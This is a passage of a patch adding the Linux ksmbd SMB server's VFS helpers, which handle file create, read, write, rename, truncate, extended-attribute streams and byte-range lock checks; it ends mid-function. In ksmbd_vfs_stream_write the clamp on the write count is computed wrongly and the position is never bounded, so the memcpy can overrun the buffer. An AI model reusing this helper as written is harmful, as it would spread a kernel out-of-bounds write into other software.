++#include <linux/kernel.h>
++#include <linux/fs.h>
++#include <linux/uaccess.h>
++#include <linux/backing-dev.h>
++#include <linux/writeback.h>
++#include <linux/xattr.h>
++#include <linux/falloc.h>
++#include <linux/fsnotify.h>
++#include <linux/dcache.h>
++#include <linux/slab.h>
++#include <linux/vmalloc.h>
++#include <linux/sched/xacct.h>
++#include <linux/crc32c.h>
++
++#include "../../internal.h"	/* for vfs_path_lookup */
++
++#include "glob.h"
++#include "oplock.h"
++#include "connection.h"
++#include "vfs.h"
++#include "vfs_cache.h"
++#include "smbacl.h"
++#include "ndr.h"
++#include "auth.h"
++#include "misc.h"
++
++#include "smb_common.h"
++#include "mgmt/share_config.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/user_session.h"
++#include "mgmt/user_config.h"
++
++static char *extract_last_component(char *path)
++{
++	char *p = strrchr(path, '/');
++
++	if (p && p[1] != '\0') {
++		*p = '\0';
++		p++;
++	} else {
++		p = NULL;
++	}
++	return p;
++}
++
++static void ksmbd_vfs_inherit_owner(struct ksmbd_work *work,
++				    struct inode *parent_inode,
++				    struct inode *inode)
++{
++	if (!test_share_config_flag(work->tcon->share_conf,
++				    KSMBD_SHARE_FLAG_INHERIT_OWNER))
++		return;
++
++	i_uid_write(inode, i_uid_read(parent_inode));
++}
++
++/**
++ * ksmbd_vfs_lock_parent() - lock parent dentry if it is stable
++ *
++ * the parent dentry got by dget_parent or @parent could be
++ * unstable, we try to lock a parent inode and lookup the
++ * child dentry again.
++ *
++ * the reference count of @parent isn't incremented.
++ */
++int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
++			  struct dentry *child)
++{
++	struct dentry *dentry;
++	int ret = 0;
++
++	inode_lock_nested(d_inode(parent), I_MUTEX_PARENT);
++	dentry = lookup_one(user_ns, child->d_name.name, parent,
++			    child->d_name.len);
++	if (IS_ERR(dentry)) {
++		ret = PTR_ERR(dentry);
++		goto out_err;
++	}
++
++	if (dentry != child) {
++		ret = -ESTALE;
++		dput(dentry);
++		goto out_err;
++	}
++
++	dput(dentry);
++	return 0;
++out_err:
++	inode_unlock(d_inode(parent));
++	return ret;
++}
++
++int ksmbd_vfs_may_delete(struct user_namespace *user_ns,
++			 struct dentry *dentry)
++{
++	struct dentry *parent;
++	int ret;
++
++	parent = dget_parent(dentry);
++	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
++	if (ret) {
++		dput(parent);
++		return ret;
++	}
++
++	ret = inode_permission(user_ns, d_inode(parent),
++			       MAY_EXEC | MAY_WRITE);
++
++	inode_unlock(d_inode(parent));
++	dput(parent);
++	return ret;
++}
++
++int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
++				   struct dentry *dentry, __le32 *daccess)
++{
++	struct dentry *parent;
++	int ret = 0;
++
++	*daccess = cpu_to_le32(FILE_READ_ATTRIBUTES | READ_CONTROL);
++
++	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_WRITE))
++		*daccess |= cpu_to_le32(WRITE_DAC | WRITE_OWNER | SYNCHRONIZE |
++				FILE_WRITE_DATA | FILE_APPEND_DATA |
++				FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES |
++				FILE_DELETE_CHILD);
++
++	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_READ))
++		*daccess |= FILE_READ_DATA_LE | FILE_READ_EA_LE;
++
++	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_EXEC))
++		*daccess |= FILE_EXECUTE_LE;
++
++	parent = dget_parent(dentry);
++	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
++	if (ret) {
++		dput(parent);
++		return ret;
++	}
++
++	if (!inode_permission(user_ns, d_inode(parent), MAY_EXEC | MAY_WRITE))
++		*daccess |= FILE_DELETE_LE;
++
++	inode_unlock(d_inode(parent));
++	dput(parent);
++	return ret;
++}
++
++/**
++ * ksmbd_vfs_create() - vfs helper for smb create file
++ * @work:	work
++ * @name:	file name that is relative to share
++ * @mode:	file create mode
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode)
++{
++	struct path path;
++	struct dentry *dentry;
++	int err;
++
++	dentry = ksmbd_vfs_kern_path_create(work, name,
++					    LOOKUP_NO_SYMLINKS, &path);
++	if (IS_ERR(dentry)) {
++		err = PTR_ERR(dentry);
++		if (err != -ENOENT)
++			pr_err("path create failed for %s, err %d\n",
++			       name, err);
++		return err;
++	}
++
++	mode |= S_IFREG;
++	err = vfs_create(mnt_user_ns(path.mnt), d_inode(path.dentry),
++			 dentry, mode, true);
++	if (!err) {
++		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry),
++					d_inode(dentry));
++	} else {
++		pr_err("File(%s): creation failed (err:%d)\n", name, err);
++	}
++	done_path_create(&path, dentry);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_mkdir() - vfs helper for smb create directory
++ * @work:	work
++ * @name:	directory name that is relative to share
++ * @mode:	directory create mode
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode)
++{
++	struct user_namespace *user_ns;
++	struct path path;
++	struct dentry *dentry;
++	int err;
++
++	dentry = ksmbd_vfs_kern_path_create(work, name,
++					    LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
++					    &path);
++	if (IS_ERR(dentry)) {
++		err = PTR_ERR(dentry);
++		if (err != -EEXIST)
++			ksmbd_debug(VFS, "path create failed for %s, err %d\n",
++				    name, err);
++		return err;
++	}
++
++	user_ns = mnt_user_ns(path.mnt);
++	mode |= S_IFDIR;
++	err = vfs_mkdir(user_ns, d_inode(path.dentry), dentry, mode);
++	if (err) {
++		goto out;
++	} else if (d_unhashed(dentry)) {
++		struct dentry *d;
++
++		d = lookup_one(user_ns, dentry->d_name.name, dentry->d_parent,
++			       dentry->d_name.len);
++		if (IS_ERR(d)) {
++			err = PTR_ERR(d);
++			goto out;
++		}
++		if (unlikely(d_is_negative(d))) {
++			dput(d);
++			err = -ENOENT;
++			goto out;
++		}
++
++		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry), d_inode(d));
++		dput(d);
++	}
++out:
++	done_path_create(&path, dentry);
++	if (err)
++		pr_err("mkdir(%s): creation failed (err:%d)\n", name, err);
++	return err;
++}
++
++static ssize_t ksmbd_vfs_getcasexattr(struct user_namespace *user_ns,
++				      struct dentry *dentry, char *attr_name,
++				      int attr_name_len, char **attr_value)
++{
++	char *name, *xattr_list = NULL;
++	ssize_t value_len = -ENOENT, xattr_list_len;
++
++	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	if (xattr_list_len <= 0)
++		goto out;
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++			name += strlen(name) + 1) {
++		ksmbd_debug(VFS, "%s, len %zd\n", name, strlen(name));
++		if (strncasecmp(attr_name, name, attr_name_len))
++			continue;
++
++		value_len = ksmbd_vfs_getxattr(user_ns,
++					       dentry,
++					       name,
++					       attr_value);
++		if (value_len < 0)
++			pr_err("failed to get xattr in file\n");
++		break;
++	}
++
++out:
++	kvfree(xattr_list);
++	return value_len;
++}
++
++static int ksmbd_vfs_stream_read(struct ksmbd_file *fp, char *buf, loff_t *pos,
++				 size_t count)
++{
++	ssize_t v_len;
++	char *stream_buf = NULL;
++
++	ksmbd_debug(VFS, "read stream data pos : %llu, count : %zd\n",
++		    *pos, count);
++
++	v_len = ksmbd_vfs_getcasexattr(file_mnt_user_ns(fp->filp),
++				       fp->filp->f_path.dentry,
++				       fp->stream.name,
++				       fp->stream.size,
++				       &stream_buf);
++	if ((int)v_len <= 0)
++		return (int)v_len;
++
++	if (v_len <= *pos) {
++		count = -EINVAL;
++		goto free_buf;
++	}
++
++	if (v_len - *pos < count)
++		count = v_len - *pos;
++
++	memcpy(buf, &stream_buf[*pos], count);
++
++free_buf:
++	kvfree(stream_buf);
++	return count;
++}
++
++/**
++ * check_lock_range() - vfs helper for smb byte range file locking
++ * @filp:	the file to apply the lock to
++ * @start:	lock start byte offset
++ * @end:	lock end byte offset
++ * @type:	byte range type read/write
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int check_lock_range(struct file *filp, loff_t start, loff_t end,
++			    unsigned char type)
++{
++	struct file_lock *flock;
++	struct file_lock_context *ctx = file_inode(filp)->i_flctx;
++	int error = 0;
++
++	if (!ctx || list_empty_careful(&ctx->flc_posix))
++		return 0;
++
++	spin_lock(&ctx->flc_lock);
++	list_for_each_entry(flock, &ctx->flc_posix, fl_list) {
++		/* check conflict locks */
++		if (flock->fl_end >= start && end >= flock->fl_start) {
++			if (flock->fl_type == F_RDLCK) {
++				if (type == WRITE) {
++					pr_err("not allow write by shared lock\n");
++					error = 1;
++					goto out;
++				}
++			} else if (flock->fl_type == F_WRLCK) {
++				/* check owner in lock */
++				if (flock->fl_file != filp) {
++					error = 1;
++					pr_err("not allow rw access by exclusive lock from other opens\n");
++					goto out;
++				}
++			}
++		}
++	}
++out:
++	spin_unlock(&ctx->flc_lock);
++	return error;
++}
++
++/**
++ * ksmbd_vfs_read() - vfs helper for smb file read
++ * @work:	smb work
++ * @fid:	file id of open file
++ * @count:	read byte count
++ * @pos:	file pos
++ *
++ * Return:	number of read bytes on success, otherwise error
++ */
++int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp, size_t count,
++		   loff_t *pos)
++{
++	struct file *filp = fp->filp;
++	ssize_t nbytes = 0;
++	char *rbuf = work->aux_payload_buf;
++	struct inode *inode = file_inode(filp);
++
++	if (S_ISDIR(inode->i_mode))
++		return -EISDIR;
++
++	if (unlikely(count == 0))
++		return 0;
++
++	if (work->conn->connection_type) {
++		if (!(fp->daccess & (FILE_READ_DATA_LE | FILE_EXECUTE_LE))) {
++			pr_err("no right to read(%pD)\n", fp->filp);
++			return -EACCES;
++		}
++	}
++
++	if (ksmbd_stream_fd(fp))
++		return ksmbd_vfs_stream_read(fp, rbuf, pos, count);
++
++	if (!work->tcon->posix_extensions) {
++		int ret;
++
++		ret = check_lock_range(filp, *pos, *pos + count - 1, READ);
++		if (ret) {
++			pr_err("unable to read due to lock\n");
++			return -EAGAIN;
++		}
++	}
++
++	nbytes = kernel_read(filp, rbuf, count, pos);
++	if (nbytes < 0) {
++		pr_err("smb read failed, err = %zd\n", nbytes);
++		return nbytes;
++	}
++
++	filp->f_pos = *pos;
++	return nbytes;
++}
++
++static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
++				  size_t count)
++{
++	char *stream_buf = NULL, *wbuf;
++	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
++	size_t size, v_len;
++	int err = 0;
++
++	ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",
++		    *pos, count);
++
++	size = *pos + count;
++	if (size > XATTR_SIZE_MAX) {
++		size = XATTR_SIZE_MAX;
++		count = (*pos + count) - XATTR_SIZE_MAX;
++	}
++
++	v_len = ksmbd_vfs_getcasexattr(user_ns,
++				       fp->filp->f_path.dentry,
++				       fp->stream.name,
++				       fp->stream.size,
++				       &stream_buf);
++	if ((int)v_len < 0) {
++		pr_err("not found stream in xattr : %zd\n", v_len);
++		err = (int)v_len;
++		goto out;
++	}
++
++	if (v_len < size) {
++		wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
++		if (!wbuf) {
++			err = -ENOMEM;
++			goto out;
++		}
++
++		if (v_len > 0)
++			memcpy(wbuf, stream_buf, v_len);
++		kvfree(stream_buf);
++		stream_buf = wbuf;
++	}
++
++	memcpy(&stream_buf[*pos], buf, count);
++
++	err = ksmbd_vfs_setxattr(user_ns,
++				 fp->filp->f_path.dentry,
++				 fp->stream.name,
++				 (void *)stream_buf,
++				 size,
++				 0);
++	if (err < 0)
++		goto out;
++
++	fp->filp->f_pos = *pos;
++	err = 0;
++out:
++	kvfree(stream_buf);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_write() - vfs helper for smb file write
++ * @work:	work
++ * @fid:	file id of open file
++ * @buf:	buf containing data for writing
++ * @count:	read byte count
++ * @pos:	file pos
++ * @sync:	fsync after write
++ * @written:	number of bytes written
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
++		    char *buf, size_t count, loff_t *pos, bool sync,
++		    ssize_t *written)
++{
++	struct file *filp;
++	loff_t	offset = *pos;
++	int err = 0;
++
++	if (work->conn->connection_type) {
++		if (!(fp->daccess & FILE_WRITE_DATA_LE)) {
++			pr_err("no right to write(%pD)\n", fp->filp);
++			err = -EACCES;
++			goto out;
++		}
++	}
++
++	filp = fp->filp;
++
++	if (ksmbd_stream_fd(fp)) {
++		err = ksmbd_vfs_stream_write(fp, buf, pos, count);
++		if (!err)
++			*written = count;
++		goto out;
++	}
++
++	if (!work->tcon->posix_extensions) {
++		err = check_lock_range(filp, *pos, *pos + count - 1, WRITE);
++		if (err) {
++			pr_err("unable to write due to lock\n");
++			err = -EAGAIN;
++			goto out;
++		}
++	}
++
++	/* Do we need to break any of a levelII oplock? */
++	smb_break_all_levII_oplock(work, fp, 1);
++
++	err = kernel_write(filp, buf, count, pos);
++	if (err < 0) {
++		ksmbd_debug(VFS, "smb write failed, err = %d\n", err);
++		goto out;
++	}
++
++	filp->f_pos = *pos;
++	*written = err;
++	err = 0;
++	if (sync) {
++		err = vfs_fsync_range(filp, offset, offset + *written, 0);
++		if (err < 0)
++			pr_err("fsync failed for filename = %pD, err = %d\n",
++			       fp->filp, err);
++	}
++
++out:
++	return err;
++}
++
++/**
++ * ksmbd_vfs_getattr() - vfs helper for smb getattr
++ * @work:	work
++ * @fid:	file id of open file
++ * @attrs:	inode attributes
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat)
++{
++	int err;
++
++	err = vfs_getattr(path, stat, STATX_BTIME, AT_STATX_SYNC_AS_STAT);
++	if (err)
++		pr_err("getattr failed, err %d\n", err);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_fsync() - vfs helper for smb fsync
++ * @work:	work
++ * @fid:	file id of open file
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id)
++{
++	struct ksmbd_file *fp;
++	int err;
++
++	fp = ksmbd_lookup_fd_slow(work, fid, p_id);
++	if (!fp) {
++		pr_err("failed to get filp for fid %llu\n", fid);
++		return -ENOENT;
++	}
++	err = vfs_fsync(fp->filp, 0);
++	if (err < 0)
++		pr_err("smb fsync failed, err = %d\n", err);
++	ksmbd_fd_put(work, fp);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_remove_file() - vfs helper for smb rmdir or unlink
++ * @name:	directory or file name that is relative to share
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name)
++{
++	struct user_namespace *user_ns;
++	struct path path;
++	struct dentry *parent;
++	int err;
++
++	if (ksmbd_override_fsids(work))
++		return -ENOMEM;
++
++	err = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, false);
++	if (err) {
++		ksmbd_debug(VFS, "can't get %s, err %d\n", name, err);
++		ksmbd_revert_fsids(work);
++		return err;
++	}
++
++	user_ns = mnt_user_ns(path.mnt);
++	parent = dget_parent(path.dentry);
++	err = ksmbd_vfs_lock_parent(user_ns, parent, path.dentry);
++	if (err) {
++		dput(parent);
++		path_put(&path);
++		ksmbd_revert_fsids(work);
++		return err;
++	}
++
++	if (!d_inode(path.dentry)->i_nlink) {
++		err = -ENOENT;
++		goto out_err;
++	}
++
++	if (S_ISDIR(d_inode(path.dentry)->i_mode)) {
++		err = vfs_rmdir(user_ns, d_inode(parent), path.dentry);
++		if (err && err != -ENOTEMPTY)
++			ksmbd_debug(VFS, "%s: rmdir failed, err %d\n", name,
++				    err);
++	} else {
++		err = vfs_unlink(user_ns, d_inode(parent), path.dentry, NULL);
++		if (err)
++			ksmbd_debug(VFS, "%s: unlink failed, err %d\n", name,
++				    err);
++	}
++
++out_err:
++	inode_unlock(d_inode(parent));
++	dput(parent);
++	path_put(&path);
++	ksmbd_revert_fsids(work);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_link() - vfs helper for creating smb hardlink
++ * @oldname:	source file name
++ * @newname:	hardlink name that is relative to share
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_link(struct ksmbd_work *work, const char *oldname,
++		   const char *newname)
++{
++	struct path oldpath, newpath;
++	struct dentry *dentry;
++	int err;
++
++	if (ksmbd_override_fsids(work))
++		return -ENOMEM;
++
++	err = kern_path(oldname, LOOKUP_NO_SYMLINKS, &oldpath);
++	if (err) {
++		pr_err("cannot get linux path for %s, err = %d\n",
++		       oldname, err);
++		goto out1;
++	}
++
++	dentry = ksmbd_vfs_kern_path_create(work, newname,
++					    LOOKUP_NO_SYMLINKS | LOOKUP_REVAL,
++					    &newpath);
++	if (IS_ERR(dentry)) {
++		err = PTR_ERR(dentry);
++		pr_err("path create err for %s, err %d\n", newname, err);
++		goto out2;
++	}
++
++	err = -EXDEV;
++	if (oldpath.mnt != newpath.mnt) {
++		pr_err("vfs_link failed err %d\n", err);
++		goto out3;
++	}
++
++	err = vfs_link(oldpath.dentry, mnt_user_ns(newpath.mnt),
++		       d_inode(newpath.dentry),
++		       dentry, NULL);
++	if (err)
++		ksmbd_debug(VFS, "vfs_link failed err %d\n", err);
++
++out3:
++	done_path_create(&newpath, dentry);
++out2:
++	path_put(&oldpath);
++out1:
++	ksmbd_revert_fsids(work);
++	return err;
++}
++
++static int ksmbd_validate_entry_in_use(struct dentry *src_dent)
++{
++	struct dentry *dst_dent;
++
++	spin_lock(&src_dent->d_lock);
++	list_for_each_entry(dst_dent, &src_dent->d_subdirs, d_child) {
++		struct ksmbd_file *child_fp;
++
++		if (d_really_is_negative(dst_dent))
++			continue;
++
++		child_fp = ksmbd_lookup_fd_inode(d_inode(dst_dent));
++		if (child_fp) {
++			spin_unlock(&src_dent->d_lock);
++			ksmbd_debug(VFS, "Forbid rename, sub file/dir is in use\n");
++			return -EACCES;
++		}
++	}
++	spin_unlock(&src_dent->d_lock);
++
++	return 0;
++}
++
++static int __ksmbd_vfs_rename(struct ksmbd_work *work,
++			      struct user_namespace *src_user_ns,
++			      struct dentry *src_dent_parent,
++			      struct dentry *src_dent,
++			      struct user_namespace *dst_user_ns,
++			      struct dentry *dst_dent_parent,
++			      struct dentry *trap_dent,
++			      char *dst_name)
++{
++	struct dentry *dst_dent;
++	int err;
++
++	if (!work->tcon->posix_extensions) {
++		err = ksmbd_validate_entry_in_use(src_dent);
++		if (err)
++			return err;
++	}
++
++	if (d_really_is_negative(src_dent_parent))
++		return -ENOENT;
++	if (d_really_is_negative(dst_dent_parent))
++		return -ENOENT;
++	if (d_really_is_negative(src_dent))
++		return -ENOENT;
++	if (src_dent == trap_dent)
++		return -EINVAL;
++
++	if (ksmbd_override_fsids(work))
++		return -ENOMEM;
++
++	dst_dent = lookup_one(dst_user_ns, dst_name, dst_dent_parent,
++			      strlen(dst_name));
++	err = PTR_ERR(dst_dent);
++	if (IS_ERR(dst_dent)) {
++		pr_err("lookup failed %s [%d]\n", dst_name, err);
++		goto out;
++	}
++
++	err = -ENOTEMPTY;
++	if (dst_dent != trap_dent && !d_really_is_positive(dst_dent)) {
++		struct renamedata rd = {
++			.old_mnt_userns	= src_user_ns,
++			.old_dir	= d_inode(src_dent_parent),
++			.old_dentry	= src_dent,
++			.new_mnt_userns	= dst_user_ns,
++			.new_dir	= d_inode(dst_dent_parent),
++			.new_dentry	= dst_dent,
++		};
++		err = vfs_rename(&rd);
++	}
++	if (err)
++		pr_err("vfs_rename failed err %d\n", err);
++	if (dst_dent)
++		dput(dst_dent);
++out:
++	ksmbd_revert_fsids(work);
++	return err;
++}
++
++int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
++			char *newname)
++{
++	struct user_namespace *user_ns;
++	struct path dst_path;
++	struct dentry *src_dent_parent, *dst_dent_parent;
++	struct dentry *src_dent, *trap_dent, *src_child;
++	char *dst_name;
++	int err;
++
++	dst_name = extract_last_component(newname);
++	if (!dst_name) {
++		dst_name = newname;
++		newname = "";
++	}
++
++	src_dent_parent = dget_parent(fp->filp->f_path.dentry);
++	src_dent = fp->filp->f_path.dentry;
++
++	err = ksmbd_vfs_kern_path(work, newname,
++				  LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
++				  &dst_path, false);
++	if (err) {
++		ksmbd_debug(VFS, "Cannot get path for %s [%d]\n", newname, err);
++		goto out;
++	}
++	dst_dent_parent = dst_path.dentry;
++
++	trap_dent = lock_rename(src_dent_parent, dst_dent_parent);
++	dget(src_dent);
++	dget(dst_dent_parent);
++	user_ns = file_mnt_user_ns(fp->filp);
++	src_child = lookup_one(user_ns, src_dent->d_name.name, src_dent_parent,
++			       src_dent->d_name.len);
++	if (IS_ERR(src_child)) {
++		err = PTR_ERR(src_child);
++		goto out_lock;
++	}
++
++	if (src_child != src_dent) {
++		err = -ESTALE;
++		dput(src_child);
++		goto out_lock;
++	}
++	dput(src_child);
++
++	err = __ksmbd_vfs_rename(work,
++				 user_ns,
++				 src_dent_parent,
++				 src_dent,
++				 mnt_user_ns(dst_path.mnt),
++				 dst_dent_parent,
++				 trap_dent,
++				 dst_name);
++out_lock:
++	dput(src_dent);
++	dput(dst_dent_parent);
++	unlock_rename(src_dent_parent, dst_dent_parent);
++	path_put(&dst_path);
++out:
++	dput(src_dent_parent);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_truncate() - vfs helper for smb file truncate
++ * @work:	work
++ * @fid:	file id of old file
++ * @size:	truncate to given size
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_truncate(struct ksmbd_work *work,
++		       struct ksmbd_file *fp, loff_t size)
++{
++	int err = 0;
++	struct file *filp;
++
++	filp = fp->filp;
++
++	/* Do we need to break any of a levelII oplock? */
++	smb_break_all_levII_oplock(work, fp, 1);
++
++	if (!work->tcon->posix_extensions) {
++		struct inode *inode = file_inode(filp);
++
++		if (size < inode->i_size) {
++			err = check_lock_range(filp, size,
++					       inode->i_size - 1, WRITE);
++		} else {
++			err = check_lock_range(filp, inode->i_size,
++					       size - 1, WRITE);
++		}
++
++		if (err) {
++			pr_err("failed due to lock\n");
++			return -EAGAIN;
++		}
++	}
++
++	err = vfs_truncate(&filp->f_path, size);
++	if (err)
++		pr_err("truncate failed, err %d\n", err);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_listxattr() - vfs helper for smb list extended attributes
++ * @dentry:	dentry of file for listing xattrs
++ * @list:	destination buffer
++ * @size:	destination buffer length
++ *
++ * Return:	xattr list length on success, otherwise error
++ */
++ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list)
++{
++	ssize_t size;
++	char *vlist = NULL;
++
++	size = vfs_listxattr(dentry, NULL, 0);
++	if (size <= 0)
++		return size;
++
++	vlist = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
++	if (!vlist)
++		return -ENOMEM;
++
++	*list = vlist;
++	size = vfs_listxattr(dentry, vlist, size);
++	if (size < 0) {
++		ksmbd_debug(VFS, "listxattr failed\n");
++		kvfree(vlist);
++		*list = NULL;
++	}
++
++	return size;
++}
++
++static ssize_t ksmbd_vfs_xattr_len(struct user_namespace *user_ns,
++				   struct dentry *dentry, char *xattr_name)
++{
++	return vfs_getxattr(user_ns, dentry, xattr_name, NULL, 0);
++}
++
++/**
++ * ksmbd_vfs_getxattr() - vfs helper for smb get extended attributes value
++ * @user_ns:	user namespace
++ * @dentry:	dentry of file for getting xattrs
++ * @xattr_name:	name of xattr name to query
++ * @xattr_buf:	destination buffer xattr value
++ *
++ * Return:	read xattr value length on success, otherwise error
++ */
++ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   char *xattr_name, char **xattr_buf)
++{
++	ssize_t xattr_len;
++	char *buf;
++
++	*xattr_buf = NULL;
++	xattr_len = ksmbd_vfs_xattr_len(user_ns, dentry, xattr_name);
++	if (xattr_len < 0)
++		return xattr_len;
++
++	buf = kmalloc(xattr_len + 1, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	xattr_len = vfs_getxattr(user_ns, dentry, xattr_name,
++				 (void *)buf, xattr_len);
++	if (xattr_len > 0)
++		*xattr_buf = buf;
++	else
++		kfree(buf);
++	return xattr_len;
++}
++
++/**
++ * ksmbd_vfs_setxattr() - vfs helper for smb set extended attributes value
++ * @user_ns:	user namespace
++ * @dentry:	dentry to set XATTR at
++ * @name:	xattr name for setxattr
++ * @value:	xattr value to set
++ * @size:	size of xattr value
++ * @flags:	destination buffer length
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
++		       struct dentry *dentry, const char *attr_name,
++		       void *attr_value, size_t attr_size, int flags)
++{
++	int err;
++
++	err = vfs_setxattr(user_ns,
++			   dentry,
++			   attr_name,
++			   attr_value,
++			   attr_size,
++			   flags);
++	if (err)
++		ksmbd_debug(VFS, "setxattr failed, err %d\n", err);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_set_fadvise() - convert smb IO caching options to linux options
++ * @filp:	file pointer for IO
++ * @options:	smb IO options
++ */
++void ksmbd_vfs_set_fadvise(struct file *filp, __le32 option)
++{
++	struct address_space *mapping;
++
++	mapping = filp->f_mapping;
++
++	if (!option || !mapping)
++		return;
++
++	if (option & FILE_WRITE_THROUGH_LE) {
++		filp->f_flags |= O_SYNC;
++	} else if (option & FILE_SEQUENTIAL_ONLY_LE) {
++		filp->f_ra.ra_pages = inode_to_bdi(mapping->host)->ra_pages * 2;
++		spin_lock(&filp->f_lock);
++		filp->f_mode &= ~FMODE_RANDOM;
++		spin_unlock(&filp->f_lock);
++	} else if (option & FILE_RANDOM_ACCESS_LE) {
++		spin_lock(&filp->f_lock);
++		filp->f_mode |= FMODE_RANDOM;
++		spin_unlock(&filp->f_lock);
++	}
++}
++
++int ksmbd_vfs_zero_data(struct ksmbd_work *work, struct ksmbd_file *fp,
++			loff_t off, loff_t len)
++{
++	smb_break_all_levII_oplock(work, fp, 1);
++	if (fp->f_ci->m_fattr & FILE_ATTRIBUTE_SPARSE_FILE_LE)
++		return vfs_fallocate(fp->filp,
++				     FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
++				     off, len);
++
++	return vfs_fallocate(fp->filp,
++			     FALLOC_FL_ZERO_RANGE | FALLOC_FL_KEEP_SIZE,
++			     off, len);
++}
++
++int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
++			 struct file_allocated_range_buffer *ranges,
++			 unsigned int in_count, unsigned int *out_count)
++{
++	struct file *f = fp->filp;
++	struct inode *inode = file_inode(fp->filp);
++	loff_t maxbytes = (u64)inode->i_sb->s_maxbytes, end;
++	loff_t extent_start, extent_end;
++	int ret = 0;
++
++	if (start > maxbytes)
++		return -EFBIG;
++
++	if (!in_count)
++		return 0;
++
++	/*
++	 * Shrink request scope to what the fs can actually handle.
++	 */
++	if (length > maxbytes || (maxbytes - length) < start)
++		length = maxbytes - start;
++
++	if (start + length > inode->i_size)
++		length = inode->i_size - start;
++
++	*out_count = 0;
++	end = start + length;
++	while (start < end && *out_count < in_count) {
++		extent_start = vfs_llseek(f, start, SEEK_DATA);
++		if (extent_start < 0) {
++			if (extent_start != -ENXIO)
++				ret = (int)extent_start;
++			break;
++		}
++
++		if (extent_start >= end)
++			break;
++
++		extent_end = vfs_llseek(f, extent_start, SEEK_HOLE);
++		if (extent_end < 0) {
++			if (extent_end != -ENXIO)
++				ret = (int)extent_end;
++			break;
++		} else if (extent_start >= extent_end) {
++			break;
++		}
++
++		ranges[*out_count].file_offset = cpu_to_le64(extent_start);
++		ranges[(*out_count)++].length =
++			cpu_to_le64(min(extent_end, end) - extent_start);
++
++		start = extent_end;
++	}
++
++	return ret;
++}
++
++int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
++			   struct dentry *dentry, char *attr_name)
++{
++	return vfs_removexattr(user_ns, dentry, attr_name);
++}
++
++int ksmbd_vfs_unlink(struct user_namespace *user_ns,
++		     struct dentry *dir, struct dentry *dentry)
++{
++	int err = 0;
++
++	err = ksmbd_vfs_lock_parent(user_ns, dir, dentry);
++	if (err)
++		return err;
++	dget(dentry);
++
++	if (S_ISDIR(d_inode(dentry)->i_mode))
++		err = vfs_rmdir(user_ns, d_inode(dir), dentry);
++	else
++		err = vfs_unlink(user_ns, d_inode(dir), dentry, NULL);
++
++	dput(dentry);
++	inode_unlock(d_inode(dir));
++	if (err)
++		ksmbd_debug(VFS, "failed to delete, err %d\n", err);
++
++	return err;
++}
++
++static bool __dir_empty(struct dir_context *ctx, const char *name, int namlen,
++		       loff_t offset, u64 ino, unsigned int d_type)
++{
++	struct ksmbd_readdir_data *buf;
++
++	buf = container_of(ctx, struct ksmbd_readdir_data, ctx);
++	buf->dirent_count++;
++
++	return buf->dirent_count <= 2;
++}
++
++/**
++ * ksmbd_vfs_empty_dir() - check for empty directory
++ * @fp:	ksmbd file pointer
++ *
++ * Return:	true if directory empty, otherwise false
++ */
++int ksmbd_vfs_empty_dir(struct ksmbd_file *fp)
++{
++	int err;
++	struct ksmbd_readdir_data readdir_data;
++
++	memset(&readdir_data, 0, sizeof(struct ksmbd_readdir_data));
++
++	set_ctx_actor(&readdir_data.ctx, __dir_empty);
++	readdir_data.dirent_count = 0;
++
